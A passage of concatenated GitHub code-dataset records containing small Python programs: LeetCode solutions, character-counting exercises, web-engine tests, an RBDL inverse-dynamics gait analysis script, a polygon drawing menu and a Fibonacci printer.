sell on day 6 (price = 3), profit =\n# 3-0 = 3.\n# Then buy on day 7 (price = 1) and sell on day 8 (price = 4), profit = 4-1 =\n# 3.\n#\n# Example 2:\n#\n#\n# Input: [1,2,3,4,5]\n# Output: 4\n# Explanation: Buy on day 1 (price = 1) and sell on day 5 (price = 5), profit =\n# 5-1 = 4.\n# Note that you cannot buy on day 1, buy on day 2 and sell them later, as you\n# are\n# engaging multiple transactions at the same time. You must sell before buying\n# again.\n#\n#\n# Example 3:\n#\n#\n# Input: [7,6,4,3,1]\n# Output: 0\n# Explanation: In this case, no transaction is done, i.e. max profit = 0.\n#\n#\n\n# tags dp\n#\n# 1. idea generalize to k transaction\n# 2. write dp formula O(k.n^2)\n#\n# Let f(i, k) be the best score at i with at most k transactions\n#\n# f(i, k) = max( f(i-1, k),\n# max(prices[i] - prices[j] + f(j, k-1)), j < i)\n# f(0, k) = 0\n# f(i, 0) = 0\n#\n# 3. Optimize the formula (trick)\n#\n# One can rewrite the formula\n#\n# f(i, k) = max( f(i-1, k),\n# prices[i] - min(prices[j] - f(j, k-1)), j < i)\n#\n# And we realize that the min can be incrementally computed. This is the\n# Same optimization we have in the case with only one transaction.\n#\n# 4. Space optimization TODO\n\n\n# @lc code=start\n#\n# Non-optimized solution TLE\n# class Solution:\n# def maxProfit(self, prices: List[int]) -> int:\n# if not prices:\n# return 0\n# n = len(prices)\n# memo = [[ 0 for _ in range(3) ] for _ in range(n) ]\n# for k in range(1, 3):\n# for i in range(1, n):\n# res = max(prices[i] - prices[j] + memo[j][k-1] for j in range(i))\n# res = max(res, memo[i-1][k])\n# memo[i][k] = res\n# return memo[n-1][2]\n\n# Time complexity is now O(k.n)\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if not prices:\n return 0\n n = len(prices)\n memo = [[ 0 for _ in range(3) ] for _ in range(n) ]\n for k in range(1, 3):\n cur_min = prices[0]\n for i in range(1, n):\n cur_min = min(cur_min, prices[i-1] - memo[i-1][k-1])\n memo[i][k] = max(prices[i] - cur_min, memo[i-1][k])\n return memo[n-1][2]\n# @lc code=end\n\n","repo_name":"phlalx/algorithms","sub_path":"leetcode/123.best-time-to-buy-and-sell-stock-iii.py","file_name":"123.best-time-to-buy-and-sell-stock-iii.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3552798510","text":"# 1) method 사용\nword = input()\nw_dict = {}\n\nfor i in word:\n if w_dict.get(i) == None:\n w_dict[i] = word.count(i)\n\nfor k, v in w_dict.items():\n print(k, v, sep=' ')\n\n\n# 2)\nword = input()\nw_dict = {}\n\nfor char in word:\n if not char in w_dict:\n w_dict[char] = 1\n else:\n w_dict[char] = w_dict[char] + 1\n\nfor k, v in w_dict.items():\n print(k, v)\n\n\n# 3) simple for문\nword = input()\nw_dict = {}\n\nfor i in word:\n w_dict[i] = 0\n\nfor i in word:\n w_dict[i] += 1\n\nfor k, v in w_dict.items():\n print(k, v)\n\n\n# 4)\nword = input()\nresult = {}\n\nfor char in word:\n result[char] = result.get(char, 0) + 1\n\nfor k, v in result.items():\n print(k, v)\n","repo_name":"w00ye0l/TIL","sub_path":"PythonPractice/python_prac_18.py","file_name":"python_prac_18.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"15961477911","text":"from ast import List\n\n\nclass Solution:\n def setZeroes(self, matrix: List[List[int]]) -> None:\n row = []\n cols = []\n for i, c in enumerate(matrix):\n for j, r in enumerate(c):\n if r == 0:\n row.append(i)\n cols.append(j)\n\n for i in row:\n for j in range(len(matrix[0])):\n matrix[i][j] = 0\n \n for j in cols:\n for i in range(len(matrix)):\n matrix[i][j] = 0\n print(matrix)\n\nif __name__=='__main__':\n Solution.setZeroes(matrix=[[1,1,1,1],[1,0,1,1],[1,0,0,1]])\n \n \n ","repo_name":"jeminkachhadiya/LeetCode","sub_path":"SDE/set_matrix_zeroes.py","file_name":"set_matrix_zeroes.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21031221512","text":"from pdebug.utils.env import VISDOM_INSTALLED\nfrom pdebug.utils.web_engine import ImageEngine, ThreeEngine\n\nimport numpy as np\nimport pytest\n\n\ndef test_three_engine():\n js_code = \"\"\"\nconst dir = new THREE.Vector3( 1, 2, 0 );\ndir.normalize();\n\nconst origin = new THREE.Vector3( 0, 0, 0 );\nconst length = 1;\nconst color = 0xffff00;\n\nconst arrowHelper = new THREE.ArrowHelper( dir, origin, length, color);\nscene.add( arrowHelper );\n\"\"\"\n engine = ThreeEngine(\"simple\")\n engine.render(js_code=js_code)\n # engine.serve(port=5160)\n\n\ndef test_image_engine(tmpdir):\n engine = ImageEngine(res_dir=tmpdir)\n image = np.zeros((100, 100, 3), dtype=np.uint8)\n image[:, :, 0] = 255\n engine.add_image(image)\n # engine.serve(port=5160)\n\n\ndef test_image_engine_sync():\n engine = ImageEngine(serve_first=True)\n image = np.zeros((100, 100, 3), dtype=np.uint8)\n image[:, :, 0] = 255\n engine.add_image(image)\n engine.serve(port=5160)\n\n\ndef test_parallel():\n engine = ImageEngine()\n\n from pdebug.contrib import mp\n\n @mp(nums=4)\n def _process(process_id, r):\n for i in r:\n print(f\"{i} / 8\")\n image = np.zeros((100, 100, 3), dtype=np.uint8)\n image[:, :, 0] = 100 + i * 5\n engine.add_image(image, prefix=f\"{process_id}_{i:06d}\")\n\n _process(list(range(8)))\n # engine.serve(port=5160)\n","repo_name":"DuinoDu/pdebug","sub_path":"pdebug/utils/tests/test_web_engine.py","file_name":"test_web_engine.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23453017693","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom Libreria.Functions import line, traslacion, rotacion, escalado\nimport matplotlib\nfrom math import pi, cos, sin\n\nmatplotlib.use('TKAgg')\n\nN = 100\nmatriz_linea = np.zeros((N, N))\nlinea = []\n\n\ndef imprimir_linea():\n for c in linea:\n matriz_linea[c[0], c[1]] = 1\n plt.imshow(matriz_linea)\n plt.colorbar()\n plt.show()\n\ndef draw_point(p = (0, 0)):\n x, y = p\n if x > 0 and y > 0: \n linea.append([y, x])\n\ndef paint_lines(line):\n for i in line: \n draw_point(i)\n\ndef generar_poligono(n = 0, r = 0):\n if n < 3: return\n teta, t_aux = (360 / n) * pi / 180, (45) * pi / 180\n puntos, dx, dy = [], 10, 10\n for _ in range(n):\n x, y = round(r * cos(t_aux) + dx), round(r * sin(t_aux) + dy)\n t_aux += teta\n puntos.append((x, y))\n return puntos \n\ndef draw_poligono(puntos):\n l = len(puntos)\n points_direction = [ [ puntos[i], puntos[i + 1 if i < l - 1 else 0] ] for i in range(l) ]\n ymax = max( [ y for x, y in puntos ] ) \n points_lines = [ j for i in points_direction for j in line(i[0], i[1]) ] \n paint_lines(points_lines) \n values_x = []\n for vy in range(ymax):\n values_x = [ x for (x, y) in points_lines if y == vy ]\n if len(values_x) == 0: continue\n for xp in range(min(values_x), max(values_x)):\n draw_point((xp, vy))\n values_x = []\n imprimir_linea()\n\ndef validar_poligono(poligono):\n if len(poligono) == 0: \n print('Debe crear un poligono primeramente')\n return False\n return True\n\ndef draw_poligono_msj(poligono, msj):\n print(poligono)\n print(msj)\n draw_poligono(poligono)\n\ndef menu():\n poligono = []\n while True:\n op = int(input('\\nSeleccione una opción:\\n1. Crear poligono\\n2. Aplicar traslación\\n3. Aplicar Escalado\\n4. Aplicar Rotación\\n5. Salir\\n'))\n if op == 5: return\n elif op == 1:\n n = int(input('Introduce el número de lados: '))\n if n < 3: \n print('El número de lados debe ser mayor a 3')\n break\n else:\n r = int(input('Introduce el valor del radio: '))\n if r > 0: poligono = generar_poligono(n, r)\n else: \n print('El valor del radio debe ser positivo')\n break\n draw_poligono_msj(poligono, 'El poligono creado es:\\n')\n elif op == 2:\n if validar_poligono(poligono):\n t = tuple(list(map(int, input('Introduce el vector de traslación: ').split())))\n poligono_trasladado = [ traslacion(p, t) for p in poligono ]\n draw_poligono_msj(poligono_trasladado, 'El poligono trasladado creado es: ')\n elif op == 3:\n if validar_poligono(poligono):\n e = tuple(list(map(int, input('Introduce el vector de escalado: ').split())))\n pf = poligono[0]\n poligono_escalado = [ escalado(p, pf, e) for p in poligono ]\n draw_poligono_msj(poligono_escalado, 'El poligono escalado es: ')\n elif op == 4:\n if validar_poligono(poligono):\n pf = tuple(list(map(int, input('Introduce la coordenada del punto de referencia: ').split())))\n teta = int(input('Introduce el ángulo: '))\n poligono_rotado = [ rotacion(p, pf, teta) for p in poligono ] \n draw_poligono_msj(poligono_rotado, 'El poligono rotado es: ')\n else: \n print('Seleccione correctamente')\n \nif '__main__' == '__main__':\n menu()","repo_name":"ChepeAicrag/Graficacion","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29998043250","text":"import numpy as np \nfrom scipy import signal\nimport rbdl\nimport csv\nfrom numpy import genfromtxt\n\n\nimport matplotlib.pyplot as plt\n\nplotInputData = True\nplotOutput = True\n\n#Preprocessing flags\nresampleFrequency = 100\n# All of the input data is resampled to the above rate. This step is included\n# so that data coming from different equipment, at different sample rates, \n# is properly handled.\n\nfilterFreq = 7.5;\n# The inverse-kinematics data is filtered using a 2nd order Butterworth filter\n# in the forwards and backwards direction (so there is no phase introduced).\n# This is the 3db frequency of\n\n\n#Read in the model\n# The model name convention follows the one in OpenSim:\n# gait: model intended for walking simulations\n# 9: DoF\n# 12: Number of muscles. In this case torque muscles\nmodel = rbdl.loadModel(\"gait912.lua\", kwargs={\"floating_base\":True,\"verbose\":True})\nprint(\"DoF: \", model.q_size)\nq_size = model.q_size\nqdot_size = model.qdot_size\n\n#Read in the experimental data\nqVIn = genfromtxt(\"qIK.csv\",delimiter=\",\") \n#Column 0: is time\n#Columns 1 ,..., N: correspond to q0, ..., qN\n\nfVIn = genfromtxt(\"grf.ff\", delimiter=\",\") #0th column is time\n#Column 0: is time\n#Columns 1, 2, 3: Right foot: CoP \n#Columns 4, 5, 6: Right foot: Ground Forces \n#Columns 7, 8, 9: Right foot: Ground torques (zero)\n#Columns 10,11,12: Left foot : CoP \n#Columns 13,14,15: Left foot : Ground Forces \n#Columns 16,17,18: Left foot : Ground torques (zero)\n\n\nfVInShape=fVIn.shape\nprint(fVInShape)\ntimeSpan = np.max(qVIn[:,0])-np.min(qVIn[:,0])\nn = int(np.round(timeSpan*resampleFrequency))\n\n#Take numerical derivatives of q to get estimates qDot (generalized velocities)\n#and qDDot (generalized accelerations)\nfV = np.zeros(shape=(n,fVInShape[1]-1),dtype=float)\ntimeV = np.zeros(shape=(n,1),dtype=float)\nqV = np.zeros(shape=(n,q_size),dtype=float)\nqDotV = np.zeros(shape=(n,q_size),dtype=float)\nqDDotV = np.zeros(shape=(n,q_size),dtype=float)\ntauV = np.zeros(shape=(n,q_size),dtype=float)\n\n#3a. The force and mocap data are interpolated to have a common sense of time.\nfor i in range(0,n):\n timeV[i,0] = (i/(n-1))*timeSpan\n for j in range(0,model.q_size):\n qV[i,j] = np.interp(timeV[i,0],qVIn[:,0],qVIn[:,j+1])\n for j in range(0,fVInShape[1]-1):\n fV[i,j] = np.interp(timeV[i,0],fVIn[:,0],fVIn[:,j+1])\n\n\n#3b. The q's are filtered using a low-pass 2nd order Butterworth filter \n# (signal.butter) applied in the forwards and then backwards directions \n# (filtfilt) so that no phase error is introduced\n\nfreq = resampleFrequency\nwn = freq*0.5;\n\nb,a=signal.butter(2, filterFreq/wn, btype='low',analog=False,output='ba')\n\n\nfor i in range(0,model.q_size):\n qV[:,i]=signal.filtfilt(b,a,qV[:,i])\n #scipy complains about this form of indexing. I'm not sure how\n #to fix this.\n\n#3e. The values for qdot and qddot are formed using numerical derivatives\nfor i in range(0,model.q_size):\n qDotV[:,i] = np.gradient(qV[:,i],timeV[:,0])\n\nfor i in range(0,model.q_size):\n qDDotV[:,i] = np.gradient(qDotV[:,i],timeV[:,0])\n\n\n#Now we're ready to perform the inverse-dynamics analysis\n\n#Working variables used to transform the recorded center-of-pressure (cop)\n#and ground force recordings (grf) into a wrench resolved in the ROOT frame\ncopR = np.zeros(shape=(3),dtype=float)\ngrfR = np.zeros(shape=(3),dtype=float)\ntqR = np.zeros(shape=(3),dtype=float)\ncopL = np.zeros(shape=(3),dtype=float)\ngrfL = np.zeros(shape=(3),dtype=float)\ntqL = np.zeros(shape=(3),dtype=float)\nfextR = np.zeros(shape=(6),dtype=float)\nfextL = np.zeros(shape=(6),dtype=float)\n\nq = np.zeros(shape=(q_size), dtype=float)\nqd = np.zeros(shape=(qdot_size),dtype=float)\nqdd = np.zeros(shape=(qdot_size),dtype=float)\ntau = np.zeros(shape=(qdot_size),dtype=float)\n#for i in range(0,n):\nidRightFoot = model.GetBodyId(\"Foot_R\")\nidLeftFoot = model.GetBodyId(\"Foot_L\")\nnBodies = len(model.mBodies)\nfext = np.zeros(shape=(nBodies,6),dtype=float)\n\n\n\nfor i in range(0,n):\n #3f. The ground forces are resolved into wrenches in the ROOT frame \n #Right foot: resolve cop & grf into a wrench in the ROOT frame\n for j in range(0,3): \n copR[j]=fV[i,j] \n grfR[j]=fV[i,j+3]\n tqR=np.cross(np.transpose(copR),np.transpose(grfR))\n for j in range(0,3):\n fextR[j ] = tqR[j]\n fextR[j+3] = grfR[j]\n for j in range(0,3):\n copL[j]=fV[i,j+9]\n grfL[j]=fV[i,j+12]\n tqL=np.cross(np.transpose(copL),np.transpose(grfL))\n for j in range(0,3):\n fextL[j ]= tqL[j]\n fextL[j+3]= grfL[j]\n #3g. The foot wrenches are applied to the appropriate id for each foot\n # see above for the command to get idRightFoot and idLeftFoot\n for j in range(0,6):\n fext[idRightFoot,j] = fextR[j]\n fext[idLeftFoot,j] = fextL[j]\n for j in range(0,q_size):\n q[j]=qV[i,j]\n for j in range(0,qdot_size):\n qd[j]=qDotV[i,j]\n qdd[j]=qDDotV[i,j]\n #3h. The inverse dynamics function in RBDL is called\n rbdl.InverseDynamics(model, q,qd,qdd,tau,fext)\n #3i. The generalized force vector tau is copied to a matrix\n for j in range(0,qdot_size):\n tauV[i,j]=tau[j]\n\n\n#3j. Plots are generated of the input and output data \nif (plotInputData == True):\n i=0;\n m=np.ceil(np.sqrt(model.q_size))\n plt.rc('font',family='serif')\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(qVIn[:,0],qVIn[:,i+1],'m')\n plt.plot(timeV,qV[:,i],'k') \n plt.xlabel('Time (s)')\n plt.title('Q'+str(i))\n plt.tight_layout()\n plt.grid(True)\n plt.box(False)\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(timeV,qDotV[:,i],'b')\n plt.xlabel('Time (s)')\n plt.title('QDot'+str(i))\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(timeV,qDDotV[:,i],'r') \n plt.xlabel('Time (s)')\n plt.title('QDDot'+str(i))\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n #Plot the ground forces\n plt.figure(figsize=(8,8))\n plt.subplot(2,1,1)\n plt.plot(timeV,fV[:,3],'b')\n plt.plot(timeV,fV[:,5],'c') \n plt.xlabel('Time (s)')\n plt.title('Right Foot Ground Forces')\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n plt.subplot(2,1,2)\n plt.plot(timeV,fV[:,12],'b')\n plt.plot(timeV,fV[:,14],'c') \n plt.xlabel('Time (s)')\n plt.title('Left Foot Ground Forces')\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n \n\n#Plot the generalized forces\nif(plotOutput==True):\n #Plot the computed generalized forces\n i=0;\n m=np.ceil(np.sqrt(model.q_size))\n plt.rc('font',family='serif')\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(timeV,tauV[:,i],'g')\n plt.xlabel('Time (s)')\n plt.title('Tau'+str(i))\n plt.tight_layout()\n plt.grid(True)\n plt.box(False)\n\nif(plotOutput==True or plotInputData == True):\n plt.show()","repo_name":"rbdl/rbdl","sub_path":"examples/walkingInverseDynamicsWithPython/processInverseDynamics.py","file_name":"processInverseDynamics.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"94"} +{"seq_id":"31763422919","text":"n = int(input('Enter a number: '))\n\nfib_1 = 0\nfib_2 = 1\n\nprint(f'\\nFibonacci Sequence to {n} terms:')\nprint(fib_1)\nprint(fib_2)\nfor i in range(3, n):\n fib_i = fib_1 + fib_2\n fib_1 = fib_2\n fib_2 = fib_i\n print(fib_i)\n ","repo_name":"sanjeetsuhag/python-basics","sub_path":"Assignments/A2-Basics/a2-2.py","file_name":"a2-2.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}